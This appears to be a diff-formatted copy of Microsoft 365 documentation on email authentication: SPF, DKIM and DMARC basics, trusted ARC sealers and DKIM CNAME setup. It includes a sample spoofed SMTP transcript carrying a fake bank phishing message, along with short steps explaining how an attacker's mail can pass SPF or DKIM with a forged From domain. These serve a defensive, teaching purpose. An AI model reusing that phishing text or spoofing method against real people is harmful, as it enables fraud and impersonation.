-To prevent email authentication failures due to services that modify **inbound** mail sent to your Microsoft 365 organization, see [Configure trusted ARC sealers](email-authentication-arc-configure.md).
-
-The rest of this article explains:
--- [Why internet email needs authentication](#why-internet-email-needs-authentication)-- [How SPF, DKIM, and DMARC work together to authenticate email message senders](#how-spf-dkim-and-dmarc-work-together-to-authenticate-email-message-senders)-- [How Microsoft uses email authentication to check inbound mail sent to Microsoft 365](#inbound-email-authentication-for-mail-sent-to-microsoft-365)-- [How to avoid email authentication failures when sending mail to Microsoft 365](#how-to-avoid-email-authentication-failures-when-sending-mail-to-microsoft-365)-
-## Why internet email needs authentication
-
-By design, Simple Mail Transfer Protocol (SMTP) email on the internet makes no effort to validate that the message sender is who they claim to be.
-
-A standard SMTP email message consists of a _message envelope_ and message content:
--- The message envelope contains information for transmitting and receiving the message between SMTP servers. The message envelope is described in [RFC 5321](https://tools.ietf.org/html/rfc5321). Recipients never see the message envelope because it's generated during the message transmission process.-- The message content contains message header fields (collectively called the _message header_) and the message body. The message header is described in [RFC 5322](https://tools.ietf.org/html/rfc5322).-
-Because of this design, a message has multiple sender values:
--- The MAIL FROM address (also known as the `5321.MailFrom` address, P1 sender, or envelope sender) is the email address that's used in the transmission of the message between SMTP email servers. This address is typically recorded in the **Return-Path** header field in the message header (although the source email server can designate a different **Return-Path** email address). This email address is used in non-delivery reports (also known as NDRs or bounce messages).-- The From address (also known as the `5322.From` address or P2 sender) is the email address in the **From** header field, and is the sender's email address that's shown in email clients.-
-The following example shows the simplified transcript of a valid message transmission between two SMTP email servers:
-
-```console
-S: HELO woodgrovebank.com
-S: MAIL FROM: dubious@proseware.com
-S: RCPT TO: astobes@tailspintoys.com
-S: DATA
-S: To: "Andrew Stobes" <astobes@tailspintoys.com>
-S: From: "Woodgrove Bank Security" <security@woodgrovebank.com>
-S: Subject: Woodgrove Bank - Action required
-S:
-S: Greetings,
-S:
-S: We need to verify your banking details.
-S: Please click the following link to verify that we have the right information for your account.
-S:
-S: https://short.url/woodgrovebank/updateaccount/12-121.aspx
-S:
-S: Thank you,
-S: Woodgrove Bank
-S: .
-```
-
-In this example:
--- The source email server identifies itself as woodgrovebank.com to the destination email server tailspintoys.com in the HELO command.-- The message recipient is `astobes@tailspintoys.com`.-- The MAIL FROM address in the message envelope (used to transmit the message between SMTP email servers) is `dubious@proseware.com`.-- The From address that's shown in the recipient's email client is `security@woodgrovebank.com`.-
-Although this message is valid according to SMTP, the domain of the MAIL FROM address (proseware.com) doesn't match the domain in the From address (woodgrovebank.com). This message is a classic example of spoofing, where the intent is likely to deceive the recipient by masking the true source of the message to use in a phishing attack.
-
-Clearly, SMTP email needs help to verify that message senders are who they claim to be!
-
-## How SPF, DKIM, and DMARC work together to authenticate email message senders
-
-This section describes why you need SPF, DKIM, and DMARC for domains on the internet.
--- **SPF**: As explained in [Set up SPF to identify valid email sources for your Microsoft 365 domain](email-authentication-spf-configure.md), SPF uses a TXT record in DNS to identify valid sources of mail from the MAIL FROM domain, and what to do if the destination email server receives mail from an undefined source ('hard fail' to reject the message; 'soft fail' to accept and mark the message).-
- **SPF issues**:
-
- - SPF validates sources for senders in the MAIL FROM domain only. SPF doesn't consider the domain in the From address or alignment between the MAIL FROM and From domains:
- - An attacker can send email that passes SPF authentication (a false negative) by following these steps:
- - Register a domain (for example, proseware.com) and configure SPF for the domain.
- - Send email from a valid source for the registered domain, with the From email addresses in a different domain (for example, woodgrovebank.com).
- - A legitimate email service that sends mail on behalf of other domains might control the MAIL FROM address. The other domains and the MAIL FROM domain don't match, so the messages can't pass SPF authentication (a false positive).
-
- - SPF breaks after messages encounter server-based email forwarding that redirects or _relays_ messages.
- - Server-based email forwarding changes the message source from the original server to the forwarding server.
- - The forwarding server isn't authorized to send mail from the original MAIL FROM domain, so the message can't pass SPF authentication (a false positive).
-
- - Each domain and any subdomains require their own individual SPF records. Subdomains don't inherit the SPF record of the parent domain. This behavior becomes problematic if you want to allow email from defined and used subdomains, but prevent email from undefined and unused subdomains.
--- **DKIM**: As explained in [Set up DKIM to sign mail from your Microsoft 365 domain](email-authentication-dkim-configure.md), DKIM uses a domain to digitally sign important elements of the message (including the From address) and stores the signature in the message header. The destination server verifies that the signed elements of the message weren't altered.-
- **How DKIM helps SPF**: DKIM can validate messages that fail SPF. For example:
-
- - Messages from an email hosting service where the same MAIL FROM address is used for mail from other domains.
- - Messages that encounter server-based email forwarding.
-
- Because the DKIM signature in the message header isn't affected or altered in these scenarios, these messages are able to pass DKIM.
-
- **DKIM issues**: The domain that DKIM uses to sign a message doesn't need to match the domain in the From address that's shown in email clients.
-
- Like SPF, an attacker can send email that passes DKIM authentication (a false negative) by following these steps:
-
- - Register a domain (for example, proseware.com) and configure DKIM for the domain.
- - Send email with the From email addresses in a different domain (for example, woodgrovebank.com).
--- **DMARC**: As explained in [Set up DMARC to validate the From address domain for senders in Microsoft 365](email-authentication-dmarc-configure.md), DMARC uses SPF and DKIM to check for alignment between the domains in the MAIL FROM and From addresses. DMARC also specifies the action that the destination email system should take on messages that fail DMARC, and identifies where to send DMARC results (both pass and fail).-
- **How DMARC helps SPF and DKIM**: As previously described, SPF makes no attempt to match the domain in MAIL FROM domain and From addresses. DKIM doesn't care if the domain that signed the message matches the domain in the From address.
-
- DMARC addresses these deficiencies by using SPF and DKIM to confirm that the domains in the MAIL FROM and From addresses match.
-
- **DMARC issues**: Legitimate services that modify messages in transit before delivery break SPF, DKIM, and therefore DMARC checks.
--- **ARC**: As explained in [Configure trusted ARC sealers](email-authentication-arc-configure.md), legitimate services that modify messages in transit can use ARC to preserve the original email authentication information of modified messages.-
- **How ARC helps DMARC**: The destination email system can identify the service as a trusted ARC sealer. ARC can then use the preserved email authentication information to validate the message.
-
-## Inbound email authentication for mail sent to Microsoft 365
-
-Because of phishing concerns and less than complete adoption of strong email authentication policies by email senders on the internet, Microsoft 365 uses _implicit email authentication_ to check inbound email. Implicit email authentication extends regular SPF, DKIM, and DMARC checks by using signals from other sources to evaluate inbound email. These sources include:
--- Sender reputation.-- Sender history.-- Recipient history.-- Behavioral analysis.-- Other advanced techniques.-
-To see Microsoft's original announcement about implicit authentication, see [A Sea of Phish Part 2 - Enhanced Anti-spoofing in Microsoft 365](https://techcommunity.microsoft.com/t5/Security-Privacy-and-Compliance/Schooling-A-Sea-of-Phish-Part-2-Enhanced-Anti-spoofing/ba-p/176209).
-
-By using these other signals, messages that would otherwise fail traditional email authentication checks can pass implicit authentication and be allowed into Microsoft 365.
-
-### Composite authentication
-
-The results of Microsoft 365's implicit authentication checks are combined and stored in a single value named _composite authentication_ or `compauth` for short. The `compauth` value is stamped into the **Authentication-Results** header in the message headers. The **Authentication-Results** header uses the following syntax:
-
-```text
-Authentication-Results:
- compauth=<fail | pass | softpass | none> reason=<yyy>
-```
-
-These values are explained at [Authentication-results message header](message-headers-eop-mdo.md#authentication-results-message-header).
-
-Admins and users can examine the message headers to discover how Microsoft 365 identified the sender as a suspicious spoofed sender or legitimate.
-
-> [!TIP]
-> It's important to understand that a composite authentication failure doesn't directly result in a message being blocked. Our system using a holistic evaluation strategy that considers the overall suspicious nature of a message along with composite authentication results. This method is designed to mitigate the risk of incorrectly blocking legitimate email from domains that might not strictly adhere to email authentication protocols. This balanced approach helps distinguish genuinely malicious email from message senders that simply fail to conform to standard email authentication practices.
-
-The following examples focus on the results of email authentication only (the `compauth` value and reason). Other Microsoft 365 protection technologies can identify messages that pass email authentication as spoofed, or identify messages that fail email authentication as legitimate.
--- **Scenario**: The domain in the SPF record or the DKIM signature doesn't match the domain in the From address.-- **Result**: The message can fail composite authentication. Despite the composite authentication failure, the message might still be allowed if other assessments don't indicate a suspicious nature:-
- ```text
- Authentication-Results: spf=none (sender IP is 192.168.1.8)
- smtp.mailfrom=maliciousdomain.com; contoso.com; dkim=pass
- (signature was verified) header.d=maliciousdomain.com;
- contoso.com; dmarc=none action=none header.from=contoso.com;
- compauth=fail reason=001
- From: chris@contoso.com
- To: michelle@fabrikam.com
- ```
--- **Scenario**: The fabrikam.com domain has no SPF, DKIM, or DMARC records.-- **Result**: Messages from senders in the fabrikam.com domain can fail composite authentication:-
- ```text
- Authentication-Results: spf=none (sender IP is 10.2.3.4)
- smtp.mailfrom=fabrikam.com; contoso.com; dkim=none
- (message not signed) header.d=none; contoso.com; dmarc=none
- action=none header.from=fabrikam.com; compauth=fail reason=001
- From: chris@fabrikam.com
- To: michelle@contoso.com
- ```
--- **Scenario**: The fabrikam.com domain has an SPF record and no DKIM record. The domains in the MAIL FROM and From addresses match.-- **Result**: The message can pass composite authentication, because the domain that passed SPF matches the domain in the From address:-
- ```text
- Authentication-Results: spf=pass (sender IP is 10.2.3.4)
- smtp.mailfrom=fabrikam.com; contoso.com; dkim=none
- (message not signed) header.d=none; contoso.com; dmarc=bestguesspass
- action=none header.from=fabrikam.com; compauth=pass reason=109
- From: chris@fabrikam.com
- To: michelle@contoso.com
- ```
--- **Scenario**: The fabrikam.com domain has a DKIM record without an SPF record. The domain that DKIM signed the message matches the domain in the From address.-- **Result**: The message can pass composite authentication, because the domain in the DKIM signature matches the domain in the From address:-
- ```text
- Authentication-Results: spf=none (sender IP is 10.2.3.4)
- smtp.mailfrom=fabrikam.com; contoso.com; dkim=pass
- (signature was verified) header.d=outbound.fabrikam.com;
- contoso.com; dmarc=bestguesspass action=none
- header.from=fabrikam.com; compauth=pass reason=109
- From: chris@fabrikam.com
- To: michelle@contoso.com
- ```
--- **Scenario**: The domain in the SPF record or the DKIM signature doesn't match the domain in the From address.-- **Result**: The message can fail composite authentication:-
- ```text
- Authentication-Results: spf=none (sender IP is 192.168.1.8)
- smtp.mailfrom=maliciousdomain.com; contoso.com; dkim=pass
- (signature was verified) header.d=maliciousdomain.com;
- contoso.com; dmarc=none action=none header.from=contoso.com;
- compauth=fail reason=001
- From: chris@contoso.com
- To: michelle@fabrikam.com
- ```
-
-## How to avoid email authentication failures when sending mail to Microsoft 365
-
-> [!TIP]
-> Microsoft 365 customers can use the following methods to allow messages from senders that are identified as spoofing or authentication failures:
->
-> - [Spoof intelligence insight](anti-spoofing-spoof-intelligence.md).
-> - [Allow entries for spoofed senders in the Tenant Allow/Block List](tenant-allow-block-list-email-spoof-configure.md#create-allow-entries-for-spoofed-senders).
-> - [Safe sender lists](create-safe-sender-lists-in-office-365.md)
--- **Configure SPF, DKIM, and DMARC records for your domains**: Use the configuration information that's provided by your domain registrar or DNS hosting service. There are also third party companies dedicated to helping set up email authentication records.-
- Many companies don't publish SPF records because they don't know all of the email sources for messages in their domain.
-
- 1. Start by publishing an SPF record that contains all email sources that you know about (especially where your corporate traffic is located), and use the enforcement rule value "soft fail" (`~all`). For example:
-
- ```text
- fabrikam.com IN TXT "v=spf1 include:spf.fabrikam.com ~all"
- ```
-
- If you create this SPF record, Microsoft 365 treats inbound email from your corporate infrastructure as authenticated, but email from unidentified sources might still be marked as spoof if it fails composite authentication. However, this behavior is still an improvement from all email from senders in the domain being marked as spoof by Microsoft 365. Typically, destination email system accept messages from senders in the domain from unidentified sources when SPF is configured with a soft fail enforcement rule.
-
- 2. Discover and include more email sources for your messages. For example:
- - On-premises email servers.
- - Email sent from a software-as-a-service (SaaS) provider.
- - Email sent from a cloud-hosting service (Microsoft Azure, GoDaddy, Rackspace, Amazon Web Services, etc.).
-
- After you identify all email sources for your domain, you can update your SPF record to use the enforcement rule value "hard fail" (`-all`).
-
- 3. Set up DKIM to digitally sign messages.
-
- 4. Set up DMARC to validate that the domains in the MAIL FROM and From addresses match, to specify what to do with messages that fail DMARC checks (reject or quarantine), and to identify reporting services to monitor DMARC results.
-
- 5. If you use bulk senders to send email on your behalf, verify that the domain in the From address matches the domain that passes SPF or DMARC.
--- **You host a domain's email or provide hosting infrastructure that can send email**:
- - Ensure your customers have documentation that explains how to configure SPF for their domains.
- - Consider DKIM signing DKIM outbound mail, even if the customer doesn't explicitly set up DKIM in their domain (sign with a default domain). You can even double-sign the email with DKIM signatures (with your company domain and the customer's domain if/when it's available).
-
- Delivery to Microsoft isn't guaranteed, even if you authenticate email originating from your platform. But, email authentication ensures that Microsoft doesn't automatically junk email from your customer domains simply because it isn't authenticated.
security Email Authentication Arc Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/email-authentication-arc-configure.md
- Title: Configure trusted ARC sealers
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier2
-
- - seo-marvel-apr2020
-description: Authenticated Received Chain (ARC) is an email authentication method that tries to preserve authentication results across devices and any message modification that occurs between the sender and recipient.
- Previously updated : 1/29/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Configure trusted ARC sealers
-
-[Email authentication](email-authentication-about.md) helps validate mail sent to and from your Microsoft 365 organization to prevent spoofed senders that are used in business email compromise (BEC), ransomware, and other phishing attacks.
-
-But, some legitimate email services might modify messages before they're delivered to your Microsoft 365 organization. Modifying inbound messages in transit can and likely will cause the following email authentication failures in Microsoft 365:
--- SPF fails because of the new message source (IP address).-- DKIM fails because of content modification.-- DMARC fails because of the SPF and DKIM failures.-
-Authenticated Received Chain (ARC) helps reduce inbound email authentication failures from message modification by legitimate email services. ARC preserves the original email authentication information at the email service. You can configure your Microsoft 365 organization to trust the service that modified the message, and to use that original information in email authentication checks.
-
-## When to use trusted ARC sealers?
-
-A Microsoft 365 organization needs to identify trusted ARC sealers only when messages delivered to Microsoft 365 recipients are regularly affected in the following ways:
--- The intermediary service modifies the message header or email content.-- The message modifications cause authentication to fail for other reasons (example, by removing attachments).-
-After an admin adds a trusted ARC sealer in the Defender portal, Microsoft 365 uses the original email authentication information that the ARC sealer provides to validate the messages sent through the service into Microsoft 365.
-
-> [!TIP]
-> Add only legitimate, required services as trusted ARC sealers in your Microsoft 365 organization. This action helps affected messages pass email authentication checks, and prevents legitimate messages from being delivered to the Junk Email folder, quarantined, or rejected due to email authentication failures.
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Email authentication settings** page, use <https://security.microsoft.com/authentication>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell). To connect to standalone EOP PowerShell, see [Connect to Exchange Online Protection PowerShell](/powershell/exchange/connect-to-exchange-online-protection-powershell).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo): Membership in the **Organization Management** or **Security Administrator** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator** or **Security Administrator** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
-
-## Use the Microsoft Defender portal to add trusted ARC sealers
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Email Authentication Settings** in the **Rules** section \> **ARC** . Or, to go directly to the **Email authentication settings** page, use <https://security.microsoft.com/authentication>.
-
-2. On the **Email authentication settings** page, verify that the **ARC** tab is selected, and then select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add**.
-
- > [!TIP]
- > If **Trusted sealers** are already listed on the **ARC** tab, select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit**.
-
-3. In the **Add trusted ARC sealers** flyout that opens, enter the trusted signing domain in the box (for example, fabrikam.com).
-
- The domain name must match the domain that's shown in the **d** value in the **ARC-Seal** and **ARC-Message-Signature** headers in affected messages. Use the following methods to view the message header:
-
- - [View internet message headers in Outlook](https://support.microsoft.com/office/cd039382-dc6e-4264-ac74-c048563d212c).
- - Use the Message Header Analyzer at <https://mha.azurewebsites.net>.
-
- Repeat this step as many times as necessary. To remove an existing entry, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the entry.
-
- When you're finished in the **Add trusted ARC sealers** flyout, select **Save**
-
-### Use Exchange Online PowerShell to add trusted ARC sealers
-
-If you'd rather use PowerShell to view, add, or remove trusted ARC sealers, connect to [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) to run the following commands.
--- **View existing trusted ARC sealers**-
- ```powershell
- Get-ArcConfig
- ```
-
- If no trusted ARC sealers are configured, the command returns no results.
--- **Add or remove trusted ARC sealers**-
- To _replace_ any existing ARC sealers with the values you specify, use the following syntax:
-
- ```powershell
- Set-ArcConfig -Identity [TenantId\]Default -ArcTrustedSealers "Domain1","Domain2",..."DomainN"
- ```
-
- The TenantId\ value isn't required in your own organization, only in delegated organizations. It's a GUID that's visible in many admin portal URLs in Microsoft 365 (the `tid=` value). For example, a32d39e2-3702-4ff5-9628-31358774c091.
-
- This example configures "cohovineyard.com" and "tailspintoys.com" as the only trusted ARC sealers in the organization.
-
- ```powershell
- Set-ArcConfig -Identity Default -ArcTrustedSealers "cohovineyard.com","tailspintoys.com"
- ```
-
- To preserve existing values, be sure to include the ARC sealers that you want to keep along with the new ARC sealers that you want to add.
-
- To add or remove ARC sealers without affecting the other entries, see the Examples section in [Set-ArcConfig](/powershell/module/exchange/set-arcconfig).
-
-## Validate a trusted ARC sealer
-
-If there's an ARC seal from a service before the message reaches Microsoft 365, check the message header for the latest ARC headers after the message is delivered.
-
-In the last **ARC-Authentication-Results** header, look for `arc=pass` and `oda=1`. These values indicate:
--- The previous ARC has been verified.-- The previous ARC sealer is trusted.-- The previous pass result can be used to override the current DMARC failure.-
-For example:
-
-```text
-ARC-Authentication-Results: i=2; mx.microsoft.com 1; spf=pass (sender ip is
-172.17.17.17) smtp.rcpttodomain=microsoft.com
-smtp.mailfrom=sampledoamin.onmicrosoft.com; dmarc=bestguesspass action=none
-header.from=sampledoamin.onmicrosoft.com; dkim=none (message not signed);
-arc=pass (0 oda=1 ltdi=1
-spf=[1,1,smtp.mailfrom=sampledoamin.onmicrosoft.com]
-dkim=[1,1,header.d=sampledoamin.onmicrosoft.com]
-dmarc=[1,1,header.from=sampledoamin.onmicrosoft.com])
-```
-
-To check whether the ARC result was used to override a DMARC failure, look for `compauth=pass` and `reason=130` in the last **Authentication-Results** header. For example:
-
-```text
-Authentication-Results: spf=fail (sender IP is 10.10.10.10)
-smtp.mailfrom=contoso.com; dkim=fail (body hash did not verify)
-header.d=contoso.com;dmarc=fail action=none
-header.from=contoso.com;compauth=pass reason=130
-```
-
-## Trusted ARC sealer mail flow diagrams
-
-The diagrams in this section contrast mail flow and the affect on email authentication results with and without a trusted ARC sealer. In both diagrams, the Microsoft 365 organization uses a legitimate email service that modifies inbound mail before delivered into Microsoft 365. This modification interrupts mail flow, which can cause email authentication failures by changing the source IP and updating the email message header.
-
-This diagram demonstrates the result _without_ a trusted ARC sealer:
--
-This diagram demonstrates the result _with_ a trusted ARC sealer:
--
-## Next steps
-
-Check your ARC Headers with Message Header Analyzer at <https://mha.azurewebsites.net>.
-
-Review the [SPF](email-authentication-spf-configure.md), [DKIM](email-authentication-dkim-configure.md), [DMARC](email-authentication-dmarc-configure.md), configuration procedures.
security Email Authentication Dkim Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/email-authentication-dkim-configure.md
- Title: How to use DKIM for email in your custom domain
- - NOCSH
--- Previously updated : 1/29/2024--
- - MET150
-
- - m365-security
- - tier1
-
- - seo-marvel-apr2020
-description: Learn how Microsoft 365 uses DomainKeys Identified Mail (DKIM) to sign outbound mail, and how to configure DKIM signing of outbound mail using custom domains.
-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Set up DKIM to sign mail from your Microsoft 365 domain
--
-DomainKeys Identified Mail (DKIM) is a method of [email authentication](email-authentication-about.md) that helps validate mail sent from your Microsoft 365 organization to prevent spoofed senders that are used in business email compromise (BEC), ransomware, and other phishing attacks.
-
-The primary purpose of DKIM is to verify that a message hasn't been altered in transit. Specifically:
-
-1. One or more private keys are generated for a domain and are used by the source email system to digitally sign important parts of outbound messages. These message parts include:
- - From, To, Subject, MIME-Version, Content-Type, Date, and other message header fields (depending on the source email system).
- - The message body.
-2. The digital signature is stored in the **DKIM-Signature** header field in the message header and remains valid as long as intermediate email systems don't modify the signed parts of the message. The signing domain is identified by the **d=** value in the **DKIM-Signature** header field.
-3. The corresponding public keys are stored in DNS records for the signing domain (CNAME records in Microsoft 365; other email systems might use TXT records).
-4. Destination email systems use the **d=** value in the **DKIM-Signature** header field to:
- - Identify the signing domain.
- - Look up the public key in the DKIM DNS record for the domain.
- - Use the public key in the DKIM DNS record for the domain to verify the message signature.
-
-Important facts about DKIM:
--- The domain that's used to DKIM sign the message isn't required to match the domain in the MAIL FROM or From addresses in the message. For more information about these addresses, see [Why internet email needs authentication](email-authentication-about.md#why-internet-email-needs-authentication).-- A message can have multiple DKIM signatures by different domains. In fact, many hosted email services sign the message using the service domain, and then sign the message again using the customer domain after the customer configures DKIM signing for the domain.-
-Before we get started, here's what you need to know about DKIM in Microsoft 365 based on your email domain:
--- **If you use only the Microsoft Online Email Routing Address (MOERA) domain for email (for example, contoso.onmicrosoft.com)**: You don't need to do anything. Microsoft automatically creates a 2048-bit public-private key pair from your initial \*.onmicrosoft.com domain. Outbound messages are automatically DKIM signed using the private key. The public key is published in a DNS record so destination email systems can verify the DKIM signature of messages.-
- But, you can also manually configure DKIM signing using the \*.onmicrosoft.com domain. For instructions, see the [Use the Defender portal to customize DKIM signing of outbound messages using the \*.onmicrosoft.com domain](#use-the-defender-portal-to-customize-dkim-signing-of-outbound-messages-using-the-onmicrosoftcom-domain) section later in this article.
-
- To verify the fact that outbound messages are automatically DKIM signed, see the [Verify DKIM signing of outbound mail from Microsoft 365](#verify-dkim-signing-of-outbound-mail-from-microsoft-365) section later in this article.
-
- For more information about \*.onmicrosoft.com domains, see [Why do I have an "onmicrosoft.com" domain?](/microsoft-365/admin/setup/domains-faq#why-do-i-have-an--onmicrosoft-com--domain).
--- **If you use one or more custom domains for email (for example, contoso.com)**: Even though all outbound mail from Microsoft 365 is automatically signed by the MOERA domain, you still have more work to do for maximum email protection:
- - **Configure DKIM signing using custom domains or subdomains**: A message needs to be DKIM signed by the domain in the From address. We also recommend configuring DMARC, and DKIM passes DMARC validation only if the domain that DKIM signed the message and the domain in the From address align.
-
- - **Subdomain considerations**:
- - For email services that aren't under your direct control (for example, bulk email services), we recommend using a subdomain (for example, marketing.contoso.com) instead of your main email domain (for example, contoso.com). You don't want issues with mail sent from those email services to affect the reputation of mail sent by employees in your main email domain. For more information about adding subdomains, see [Can I add custom subdomains or multiple domains to Microsoft 365?](/microsoft-365/admin/setup/domains-faq#can-i-add-custom-subdomains-or-multiple-domains-to-microsoft-365).
- - Each subdomain that you use to send email from Microsoft 365 requires its own DKIM configuration.
-
- > [!TIP]
- > Email authentication protection for _undefined_ subdomains is covered by DMARC. Any subdomains (defined or not) inherit the DMARC settings of the parent domain (which can be overridden per subdomain). For more information, see [Set up DMARC to validate the From address domain for senders in Microsoft 365](email-authentication-dmarc-configure.md).
-
- - **If you own registered but unused domains**: If you own registered domains that aren't used for email or anything at all (also known as _parked domains_), don't publish DKIM records for those domains. The lack of a DKIM record (hence, the lack of a public key in DNS to validate the message signature) prevents DKIM validation of forged domains.
--- **DKIM alone is not enough**. For the best level of email protection for your custom domains, you also need to configure SPF and DMARC as part of your overall [email authentication](email-authentication-about.md) strategy. For more information, see the [Next Steps](#next-steps) section at the end of this article.-
-The rest of this article describes the DKIM CNAME records that you need to create for custom domains in Microsoft 365, and configuration procedures for DKIM using custom domains.
-
-> [!TIP]
-> Configuring DKIM signing using a custom domain is a mixture of procedures in Microsoft 365 and procedures at the domain registrar of the custom domain.
->
-> We provide instructions to create CNAME records for different Microsoft 365 services at many domain registrars. You can use these instructions as a starting point to create the create the DKIM CNAME records. For more information, see [Add DNS records to connect your domain](../../admin/get-help-with-domains/create-dns-records-at-any-dns-hosting-provider.md).
->
-> If you're unfamiliar with DNS configuration, contact your domain registrar and ask for help.
-
-## Syntax for DKIM CNAME records
-
-> [!TIP]
-> You use the Defender portal or Exchange Online PowerShell to view the required CNAME values for DKIM signing of outbound messages using a custom domain. The values presented here are for illustration only. To get the values that are required for your custom domains or subdomains, use the procedures later in this article.
-
-DKIM is exhaustively described in [RFC 6376](https://datatracker.ietf.org/doc/html/rfc6376).
-
-The basic syntax of the DKIM CNAME records for custom domains that send mail from Microsoft 365 is:
-
-```text
-Hostname: selector1._domainkey
-Points to address or value: selector1-<CustomDomain>._domainkey.<InitialDomain>
-
-Hostname: selector2._domainkey
-Points to address or value: selector2-<CustomDomain>._domainkey.<InitialDomain>
-```
--- In Microsoft 365, two public-private key pairs are generated when DKIM signing using a custom domain or subdomain is enabled. The private keys that are used to sign the message are inaccessible. The CNAME records point to the corresponding public keys that are used to verify the DKIM signature. These records are known as _selectors_.
- - Only one selector is active and used when DKIM signing using a custom domain is enabled.
- - The second selector is inactive. It's activated and used only after any future [DKIM key rotation](#rotate-dkim-keys), and then only after the original selector is deactivated.
-
- The selector that's used to verify the DKIM signature (which infers the private key that was used to sign the message) is stored in the **s=** value in the **DKIM-Signature** header field (for example, `s=selector1-contoso-com`).
--- **Hostname**: The values are the same for all Microsoft 365 organizations: `selector1._domainkey` and `selector2._domainkey`.--- **\<CustomDomain\>**: The custom domain or subdomain with periods replaced by dashes. For example, `contoso.com` becomes `contoso-com`, or `marketing.contoso.com` becomes `marketing-contoso-com`.--- **\<InitialDomain\>**: The \*.onmicrosoft.com that you used when you enrolled in Microsoft 365 (for example, contoso.onmicrosoft.com).-
-For example, your organization has the following domains in Microsoft 365:
--- **Initial domain**: cohovineyardandwinery.onmicrosoft.com-- **Custom domains**: cohovineyard.com and cohowinery.com-
-You need to create two CNAME records in each custom domain, for a total of four CNAME records:
--- **CNAME records in the cohovineyard.com domain**:-
- **Hostname**: `selector1._domainkey`<br>
- **Points to address or value**: `selector1-cohovineyard-com._domainkey.cohovineyardandwinery.onmicrosoft.com`
-
- **Hostname**: `selector2._domainkey`<br>
- **Points to address or value**: `selector2-cohovineyard-com._domainkey.cohovineyardandwinery.onmicrosoft.com`
--- **CNAME records in the cohowinery.com domain**:-
- **Hostname**: `selector1._domainkey`<br>
- **Points to address or value**: `selector1-cohowinery-com._domainkey.cohovineyardandwinery.onmicrosoft.com`
-
- **Hostname**: `selector2._domainkey`<br>
- **Points to address or value**: `selector2-cohowinery-com._domainkey.cohovineyardandwinery.onmicrosoft.com`
-
-## Configure DKIM signing of outbound messages in Microsoft 365
-
-### Use the Defender portal to enable DKIM signing of outbound messages using a custom domain
-
-> [!TIP]
-> Enabling DKIM signing of outbound messages using a custom domain effectively switches DKIM signing from using the initial \*.onmicrosoft.com domain to using the custom domain.
->
-> You can use a custom domain or subdomain to DKIM sign outbound mail only after the domain has been successfully added to Microsoft 365. For instructions, see [Add a domain](/microsoft-365/admin/setup/add-domain#add-a-domain).
->
-> The main factor that determines when a custom domain starts DKIM signing outbound mail is the CNAME record detection in DNS.
-
-To use the procedures in this section, the custom domain or subdomain must appear on the **DKIM** tab of the **Email authentication settings** page at <https://security.microsoft.com/authentication?viewid=DKIM>. The properties of the domain in the details flyout must contain the following values:
---- The **Sign messages for this domain with DKIM signatures** toggle is set to **Disabled** :::image type="icon" source="../../media/scc-toggle-off.png" border="false":::.-- The **Status** value is **Not signing DKIM signatures for the domain**.-- **Create DKIM keys** isn't present. **Rotate DKIM keys** is visible, but is grayed out.-
-Proceed if the domain satisfies these requirements.
-
-1. In the Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Policies & rules** \> **Threat policies** \> **Email authentication settings** page. Or, to go directly to the **Email authentication settings** page, use <https://security.microsoft.com/authentication>.
-
-2. On the **Email authentication settings** page, select the **DKIM** tab.
-
-3. On the **DKIM** tab, select the custom domain to configure by clicking anywhere in the row other than the check box next to the name.
-
- :::image type="content" source="../../media/email-auth-dkim-domain-list.png" alt-text="The DKIM tab of the Email authentication page in the Defender portal." lightbox="../../media/email-auth-dkim-domain-list.png":::
-
-4. In the domain details flyout that opens, select the **Sign messages for this domain with DKIM signatures** toggle that's currently set to **Disabled** :::image type="icon" source="../../media/scc-toggle-off.png" border="false":::.
-
- Note the **Last checked date** value.
-
-5. A **Client error** dialog opens. The error contains the values to use in the two CNAME records that you create at the domain registrar for the domain.
-
- In this example, the custom domain is contoso.com and the initial domain for the Microsoft 365 organization is contoso.onmicrosoft.com. The error message looks like this:
-
- ```text
- |Microsoft.Exchange.ManagementTasks.ValidationException|CNAME record does not
- exist for this config. Please publish the following two CNAME records first. Domain Name
- : contoso.com Host Name : selector1._domainkey Points to address or value: selector1-
- contoso-com._domainkey.contoso.onmicrosoft.com Host Name : selector2._domainkey
- Points to address or value: selector2-contoso-com._domainkey.contoso.onmicrosoft.com .
